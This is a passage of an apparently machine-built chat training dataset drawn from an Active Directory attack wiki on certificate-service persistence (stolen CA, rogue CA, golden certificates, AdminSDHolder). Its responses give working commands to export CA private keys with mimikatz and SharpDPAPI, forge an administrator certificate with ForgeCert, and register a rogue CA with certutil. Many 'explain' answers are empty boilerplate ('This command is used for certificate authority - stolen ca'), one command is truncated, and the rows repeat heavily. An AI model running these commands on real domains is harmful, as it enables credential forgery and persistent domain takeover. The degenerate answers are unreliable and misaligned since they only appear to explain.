right click > All Tasks > Back up CA... > selet \"Private key and CA certificate\" > Next`?"}, {"role": "assistant", "content": "This command is used for certificate authority - stolen ca. Stolen CA"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Win+R > certsrv.msc > CA > right click > All Tasks > Back up CA... > selet \"Private key and CA certificate\" > Next`?", "response": "This command is used for certificate authority - stolen ca. Stolen CA", "metadata": {"corpus_index": 1175, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the mimikatz.exe command for certificate authority - stolen ca"}, {"role": "assistant", "content": "mimikatz.exe \"crypto::capi\" \"crypto::cng\" \"crypto::certificates /export\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the mimikatz.exe command for certificate authority - stolen ca", "response": "mimikatz.exe \"crypto::capi\" \"crypto::cng\" \"crypto::certificates /export\"", "metadata": {"corpus_index": 1176, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "mimikatz.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Certificate authority - Stolen CA during a pentest?"}, {"role": "assistant", "content": "mimikatz.exe \"crypto::capi\" \"crypto::cng\" \"crypto::certificates /export\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Certificate authority - Stolen CA during a pentest?", "response": "mimikatz.exe \"crypto::capi\" \"crypto::cng\" \"crypto::certificates /export\"", "metadata": {"corpus_index": 1176, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `mimikatz.exe \"crypto::capi\" \"crypto::cng\" \"crypto::certificates /export\"`?"}, {"role": "assistant", "content": "This command is used for certificate authority - stolen ca. Stolen CA"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `mimikatz.exe \"crypto::capi\" \"crypto::cng\" \"crypto::certificates /export\"`?", "response": "This command is used for certificate authority - stolen ca. Stolen CA", "metadata": {"corpus_index": 1176, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the SharpDPAPI.exe syntax for certificate authority - stolen ca?"}, {"role": "assistant", "content": "SharpDPAPI.exe certificates /machine"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the SharpDPAPI.exe syntax for certificate authority - stolen ca?", "response": "SharpDPAPI.exe certificates /machine", "metadata": {"corpus_index": 1177, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "SharpDPAPI.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Certificate authority - Stolen CA"}, {"role": "assistant", "content": "SharpDPAPI.exe certificates /machine"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Certificate authority - Stolen CA", "response": "SharpDPAPI.exe certificates /machine", "metadata": {"corpus_index": 1177, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `SharpDPAPI.exe certificates /machine`?"}, {"role": "assistant", "content": "This command is used for certificate authority - stolen ca. Stolen CA"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `SharpDPAPI.exe certificates /machine`?", "response": "This command is used for certificate authority - stolen ca. Stolen CA", "metadata": {"corpus_index": 1177, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the openssl command to certificate authority - stolen ca"}, {"role": "assistant", "content": "openssl pkcs12 -in \"ca.pem\" -keyex -CSP \"Microsoft Enhanced\nCryptographic Provider v1.0\" -export -out \"ca.pfx\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the openssl command to certificate authority - stolen ca", "response": "openssl pkcs12 -in \"ca.pem\" -keyex -CSP \"Microsoft Enhanced\nCryptographic Provider v1.0\" -export -out \"ca.pfx\"", "metadata": {"corpus_index": 1178, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "openssl"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certificate authority - Stolen CA?"}, {"role": "assistant", "content": "openssl pkcs12 -in \"ca.pem\" -keyex -CSP \"Microsoft Enhanced\nCryptographic Provider v1.0\" -export -out \"ca.pfx\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certificate authority - Stolen CA?", "response": "openssl pkcs12 -in \"ca.pem\" -keyex -CSP \"Microsoft Enhanced\nCryptographic Provider v1.0\" -export -out \"ca.pfx\"", "metadata": {"corpus_index": 1178, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `openssl pkcs12 -in \"ca.pem\" -keyex -CSP \"Microsoft Enhanced`?"}, {"role": "assistant", "content": "This command is used for certificate authority - stolen ca. Stolen CA"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `openssl pkcs12 -in \"ca.pem\" -keyex -CSP \"Microsoft Enhanced`?", "response": "This command is used for certificate authority - stolen ca. Stolen CA", "metadata": {"corpus_index": 1178, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the ForgeCert.exe command for certificate authority - stolen ca"}, {"role": "assistant", "content": "ForgeCert.exe --CaCertPath \"ca.pfx\" --CaCertPassword \"Password\" --Subject \"CN=User\" --SubjectAltName \"administrator@domain.local\" --NewCertPath \"administrator.pfx\" --NewCertPassword \"Password\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the ForgeCert.exe command for certificate authority - stolen ca", "response": "ForgeCert.exe --CaCertPath \"ca.pfx\" --CaCertPassword \"Password\" --Subject \"CN=User\" --SubjectAltName \"administrator@domain.local\" --NewCertPath \"administrator.pfx\" --NewCertPassword \"Password\"", "metadata": {"corpus_index": 1179, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ForgeCert.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certificate authority - Stolen CA"}, {"role": "assistant", "content": "ForgeCert.exe --CaCertPath \"ca.pfx\" --CaCertPassword \"Password\" --Subject \"CN=User\" --SubjectAltName \"administrator@domain.local\" --NewCertPath \"administrator.pfx\" --NewCertPassword \"Password\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certificate authority - Stolen CA", "response": "ForgeCert.exe --CaCertPath \"ca.pfx\" --CaCertPassword \"Password\" --Subject \"CN=User\" --SubjectAltName \"administrator@domain.local\" --NewCertPath \"administrator.pfx\" --NewCertPassword \"Password\"", "metadata": {"corpus_index": 1179, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ForgeCert.exe --CaCertPath \"ca.pfx\" --CaCertPassword \"Password\" --Subject \"CN=User\" --SubjectAltName \"administrator@domain.local\" --NewCertPath \"administrator.pfx\" --NewCertPassword \"Password\"`?"}, {"role": "assistant", "content": "This command is used for certificate authority - stolen ca. Stolen CA"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ForgeCert.exe --CaCertPath \"ca.pfx\" --CaCertPassword \"Password\" --Subject \"CN=User\" --SubjectAltName \"administrator@domain.local\" --NewCertPath \"administrator.pfx\" --NewCertPassword \"Password\"`?", "response": "This command is used for certificate authority - stolen ca. Stolen CA", "metadata": {"corpus_index": 1179, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Certificate authority - Rogue CA?"}, {"role": "assistant", "content": "> [!WARNING]\n> > it is usually preferable for an attacker to steal the existing CA certificate instead of installing an additional rogue CA certificate (Certified_Pre-Owned.pdf)\n\nAn attacker with sufficient privileges in the domain can setup a rogue CA and make the domain's resources trust it. Once the rogue CA is trusted, the attacker can forge and sign client certificates.\n\nIn order to register the rogue CA, the self-signed CA cert must be added to the NTAuthCertificates object's cacertificate attribute, and in the RootCA directory services store.\n\nRegistering the rogue CA can be done remotely with the certutil.exe utility from Windows systems.\n\n``batch\ncertutil.exe -dspublish -f \"C:\\Temp\\CERT.crt\" NTAuthCA\n``\n\nOnce this is done, a certificate can be forged, signed and used as explained above: #stolen-ca"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Certificate authority - Rogue CA?", "response": "> [!WARNING]\n> > it is usually preferable for an attacker to steal the existing CA certificate instead of installing an additional rogue CA certificate (Certified_Pre-Owned.pdf)\n\nAn attacker with sufficient privileges in the domain can setup a rogue CA and make the domain's resources trust it. Once the rogue CA is trusted, the attacker can forge and sign client certificates.\n\nIn order to register the rogue CA, the self-signed CA cert must be added to the NTAuthCertificates object's cacertificate attribute, and in the RootCA directory services store.\n\nRegistering the rogue CA can be done remotely with the certutil.exe utility from Windows systems.\n\n``batch\ncertutil.exe -dspublish -f \"C:\\Temp\\CERT.crt\" NTAuthCA\n``\n\nOnce this is done, a certificate can be forged, signed and used as explained above: #stolen-ca", "metadata": {"corpus_index": 1180, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Certificate authority - Rogue CA during a pentest?"}, {"role": "assistant", "content": "> [!WARNING]\n> > it is usually preferable for an attacker to steal the existing CA certificate instead of installing an additional rogue CA certificate (Certified_Pre-Owned.pdf)\n\nAn attacker with sufficient privileges in the domain can setup a rogue CA and make the domain's resources trust it. Once the rogue CA is trusted, the attacker can forge and sign client certificates.\n\nIn order to register the rogue CA, the self-signed CA cert must be added to the NTAuthCertificates object's cacertificate attribute, and in the RootCA directory services store.\n\nRegistering the rogue CA can be done remotely with the certutil.exe utility from Windows systems.\n\n``batch\ncertutil.exe -dspublish -f \"C:\\Temp\\CERT.crt\" NTAuthCA\n``\n\nOnce this is done, a certificate can be forged, signed and used as explained above: #stolen-ca"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Certificate authority - Rogue CA during a pentest?", "response": "> [!WARNING]\n> > it is usually preferable for an attacker to steal the existing CA certificate instead of installing an additional rogue CA certificate (Certified_Pre-Owned.pdf)\n\nAn attacker with sufficient privileges in the domain can setup a rogue CA and make the domain's resources trust it. Once the rogue CA is trusted, the attacker can forge and sign client certificates.\n\nIn order to register the rogue CA, the self-signed CA cert must be added to the NTAuthCertificates object's cacertificate attribute, and in the RootCA directory services store.\n\nRegistering the rogue CA can be done remotely with the certutil.exe utility from Windows systems.\n\n``batch\ncertutil.exe -dspublish -f \"C:\\Temp\\CERT.crt\" NTAuthCA\n``\n\nOnce this is done, a certificate can be forged, signed and used as explained above: #stolen-ca", "metadata": {"corpus_index": 1180, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the certutil.exe syntax for certificate authority - rogue ca?"}, {"role": "assistant", "content": "certutil.exe -dspublish -f \"C:\\Temp\\CERT.crt\" NTAuthCA"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the certutil.exe syntax for certificate authority - rogue ca?", "response": "certutil.exe -dspublish -f \"C:\\Temp\\CERT.crt\" NTAuthCA", "metadata": {"corpus_index": 1181, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certutil.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certificate authority - Rogue CA"}, {"role": "assistant", "content": "certutil.exe -dspublish -f \"C:\\Temp\\CERT.crt\" NTAuthCA"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certificate authority - Rogue CA", "response": "certutil.exe -dspublish -f \"C:\\Temp\\CERT.crt\" NTAuthCA", "metadata": {"corpus_index": 1181, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certutil.exe -dspublish -f \"C:\\Temp\\CERT.crt\" NTAuthCA`?"}, {"role": "assistant", "content": "This command is used for certificate authority - rogue ca. Rogue CA"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certutil.exe -dspublish -f \"C:\\Temp\\CERT.crt\" NTAuthCA`?", "response": "This command is used for certificate authority - rogue ca. Rogue CA", "metadata": {"corpus_index": 1181, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Golden certificate - Theory?"}, {"role": "assistant", "content": "Golden certificates usually refer to one of two types of attacks.\n\n* Forge certificate and sign them with the CA cert private key --> #stolen-ca\n* Modify a template and turn it into a SmartCard template --> access-controls.md\n\nMost tools (certsync, certipy) and resources refer to the #stolen-ca technique when mentioning Golden Certificates. Since Golden Tickets consist in Kerberos tickets forged when knowing the KRBTGT keys, it makes sense to call \"Golden Certificate\" a technique that consists in forging a certificate when knowing the CA private key."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Golden certificate - Theory?", "response": "Golden certificates usually refer to one of two types of attacks.\n\n* Forge certificate and sign them with the CA cert private key --> #stolen-ca\n* Modify a template and turn it into a SmartCard template --> access-controls.md\n\nMost tools (certsync, certipy) and resources refer to the #stolen-ca technique when mentioning Golden Certificates. Since Golden Tickets consist in Kerberos tickets forged when knowing the KRBTGT keys, it makes sense to call \"Golden Certificate\" a technique that consists in forging a certificate when knowing the CA private key.", "metadata": {"corpus_index": 1182, "category": "active_directory", "source_file": "docs/src/ad/persistence/adcs/golden-certificate.md", "page_title": "Golden certificate", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Golden certificate - Theory"}, {"role": "assistant", "content": "Golden certificates usually refer to one of two types of attacks.\n\n* Forge certificate and sign them with the CA cert private key --> #stolen-ca\n* Modify a template and turn it into a SmartCard template --> access-controls.md\n\nMost tools (certsync, certipy) and resources refer to the #stolen-ca technique when mentioning Golden Certificates. Since Golden Tickets consist in Kerberos tickets forged when knowing the KRBTGT keys, it makes sense to call \"Golden Certificate\" a technique that consists in forging a certificate when knowing the CA private key."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Golden certificate - Theory", "response": "Golden certificates usually refer to one of two types of attacks.\n\n* Forge certificate and sign them with the CA cert private key --> #stolen-ca\n* Modify a template and turn it into a SmartCard template --> access-controls.md\n\nMost tools (certsync, certipy) and resources refer to the #stolen-ca technique when mentioning Golden Certificates. Since Golden Tickets consist in Kerberos tickets forged when knowing the KRBTGT keys, it makes sense to call \"Golden Certificate\" a technique that consists in forging a certificate when knowing the CA private key.", "metadata": {"corpus_index": 1182, "category": "active_directory", "source_file": "docs/src/ad/persistence/adcs/golden-certificate.md", "page_title": "Golden certificate", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Certificate Services (AD-CS)?"}, {"role": "assistant", "content": "> [!TIP]\n> See AD > Movement > Certificate Services (AD-CS) to know more about it."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Certificate Services (AD-CS)?", "response": "> [!TIP]\n> See AD > Movement > Certificate Services (AD-CS) to know more about it.", "metadata": {"corpus_index": 1183, "category": "active_directory", "source_file": "docs/src/ad/persistence/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certificate Services (AD-CS)?"}, {"role": "assistant", "content": "> [!TIP]\n> See AD > Movement > Certificate Services (AD-CS) to know more about it."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certificate Services (AD-CS)?", "response": "> [!TIP]\n> See AD > Movement > Certificate Services (AD-CS) to know more about it.", "metadata": {"corpus_index": 1183, "category": "active_directory", "source_file": "docs/src/ad/persistence/adcs/index.md", "page_title": "Certificate Services (AD-CS)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about AdminSDHolder - Theory?"}, {"role": "assistant", "content": "AdminSdHolder protects domain objects against permission changes. \"AdminSdHolder\" either refers to a domain object, a \"worker code\" or an operation depending on the context. \n\nThe operation consists in the PDC (Principal Domain Controller) Emulator restoring pre-set permissions for high-privilege users every 60 minutes. Understanding what DACLs/ACEs are and how to abuse them is a requirement to the understanding of this persistence technique (see Access Controls abuse).\n\nThe operation is conducted by a \"worker code\" called SDProp (Security Descriptor propagator). \n\nSDProp propagates AdminSdHolder's Security Descriptor (which contains the DACL) to every protected object every 60 minutes if their SD is different.\n\nThe AdminSdHolder object is located at CN=AdminSdHolder,CN=SYSTEM,DC=DOMAIN,DC=LOCAL. For instance, the default AdminSdHolder object's DACL contains the following.\n\n* Authenticated Users: Read\n* SYSTEM: Full Control\n* Administrators: Modify\n* Domain Admins: ReadAndExecute\n* Enterprise Admins: ReadAndExecute\n\nThe default protected objects are the following.\n\n* member users (possibly nested) of the following groups: Account Operators, Administrators, Backup Operators, Domain Admins, Domain Controllers, Enterprise Admins, Print Operators, Read-only Domain Controllers, Replicator, Schema Admins, Server Operators\n* the following users: Administrator, krbtgt\n\n> [!TIP]\n> It's worth noting the members of the Domain Controllers and Read-Only Domain Controllers groups are not protected (source), only the groups are.\n\n> [!TIP]\n> When talking about AdminSdHolder, the AdminCount attribute is usually mentioned. This attribute is automatically set on an object when adding it to a protected group. Originally, the purpose was to improve SDProp's performance. AdminCount cannot be used for malicious purposes and is now mainly informative.\n> \n> Also, AdminCount will block inheritance. This means that setting inheritence in the ACE added to AdminSdHolder will be mostly useless. "}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about AdminSDHolder - Theory?", "response": "AdminSdHolder protects domain objects against permission changes. \"AdminSdHolder\" either refers to a domain object, a \"worker code\" or an operation depending on the context. \n\nThe operation consists in the PDC (Principal Domain Controller) Emulator restoring pre-set permissions for high-privilege users every 60 minutes. Understanding what DACLs/ACEs are and how to abuse them is a requirement to the understanding of this persistence technique (see Access Controls abuse).\n\nThe operation is conducted by a \"worker code\" called SDProp (Security Descriptor propagator). \n\nSDProp propagates AdminSdHolder's Security Descriptor (which contains the DACL) to every protected object every 60 minutes if their SD is different.\n\nThe AdminSdHolder object is located at CN=AdminSdHolder,CN=SYSTEM,DC=DOMAIN,DC=LOCAL. For instance, the default AdminSdHolder object's DACL contains the following.\n\n* Authenticated Users: Read\n* SYSTEM: Full Control\n* Administrators: Modify\n* Domain Admins: ReadAndExecute\n* Enterprise Admins: ReadAndExecute\n\nThe default protected objects are the following.\n\n* member users (possibly nested) of the following groups: Account Operators, Administrators, Backup Operators, Domain Admins, Domain Controllers, Enterprise Admins, Print Operators, Read-only Domain Controllers, Replicator, Schema Admins, Server Operators\n* the following users: Administrator, krbtgt\n\n> [!TIP]\n> It's worth noting the members of the Domain Controllers and Read-Only Domain Controllers groups are not protected (source), only the groups are.\n\n> [!TIP]\n> When talking about AdminSdHolder, the AdminCount attribute is usually mentioned. This attribute is automatically set on an object when adding it to a protected group. Originally, the purpose was to improve SDProp's performance. AdminCount cannot be used for malicious purposes and is now mainly informative.\n> \n> Also, AdminCount will block inheritance. This means that setting inheritence in the ACE added to AdminSdHolder will be mostly useless. ", "metadata": {"corpus_index": 1184, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for AdminSDHolder - Theory?"}, {"role": "assistant", "content": "AdminSdHolder protects domain objects against permission changes. \"AdminSdHolder\" either refers to a domain object, a \"worker code\" or an operation depending on the context. \n\nThe operation consists in the PDC (Principal Domain Controller) Emulator restoring pre-set permissions for high-privilege users every 60 minutes. Understanding what DACLs/ACEs are and how to abuse them is a requirement to the understanding of this persistence technique (see Access Controls abuse).\n\nThe operation is conducted by a \"worker code\" called SDProp (Security Descriptor propagator). \n\nSDProp propagates AdminSdHolder's Security Descriptor (which contains the DACL) to every protected object every 60 minutes if their SD is different.\n\nThe AdminSdHolder object is located at CN=AdminSdHolder,CN=SYSTEM,DC=DOMAIN,DC=LOCAL. For instance, the default AdminSdHolder object's DACL contains the following.\n\n* Authenticated Users: Read\n* SYSTEM: Full Control\n* Administrators: Modify\n* Domain Admins: ReadAndExecute\n* Enterprise Admins: ReadAndExecute\n\nThe default protected objects are the following.\n\n* member users (possibly nested) of the following groups: Account Operators, Administrators, Backup Operators, Domain Admins, Domain Controllers, Enterprise Admins, Print Operators, Read-only Domain Controllers, Replicator, Schema Admins, Server Operators\n* the following users: Administrator, krbtgt\n\n> [!TIP]\n> It's worth noting the members of the Domain Controllers and Read-Only Domain Controllers groups are not protected (source), only the groups are.\n\n> [!TIP]\n> When talking about AdminSdHolder, the AdminCount attribute is usually mentioned. This attribute is automatically set on an object when adding it to a protected group. Originally, the purpose was to improve SDProp's performance. AdminCount cannot be used for malicious purposes and is now mainly informative.\n> \n> Also, AdminCount will block inheritance. This means that setting inheritence in the ACE added to AdminSdHolder will be mostly useless. "}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for AdminSDHolder - Theory?", "response": "AdminSdHolder protects domain objects against permission changes. \"AdminSdHolder\" either refers to a domain object, a \"worker code\" or an operation depending on the context. \n\nThe operation consists in the PDC (Principal Domain Controller) Emulator restoring pre-set permissions for high-privilege users every 60 minutes. Understanding what DACLs/ACEs are and how to abuse them is a requirement to the understanding of this persistence technique (see Access Controls abuse).\n\nThe operation is conducted by a \"worker code\" called SDProp (Security Descriptor propagator). \n\nSDProp propagates AdminSdHolder's Security Descriptor (which contains the DACL) to every protected object every 60 minutes if their SD is different.\n\nThe AdminSdHolder object is located at CN=AdminSdHolder,CN=SYSTEM,DC=DOMAIN,DC=LOCAL. For instance, the default AdminSdHolder object's DACL contains the following.\n\n* Authenticated Users: Read\n* SYSTEM: Full Control\n* Administrators: Modify\n* Domain Admins: ReadAndExecute\n* Enterprise Admins: ReadAndExecute\n\nThe default protected objects are the following.\n\n* member users (possibly nested) of the following groups: Account Operators, Administrators, Backup Operators, Domain Admins, Domain Controllers, Enterprise Admins, Print Operators, Read-only Domain Controllers, Replicator, Schema Admins, Server Operators\n* the following users: Administrator, krbtgt\n\n> [!TIP]\n> It's 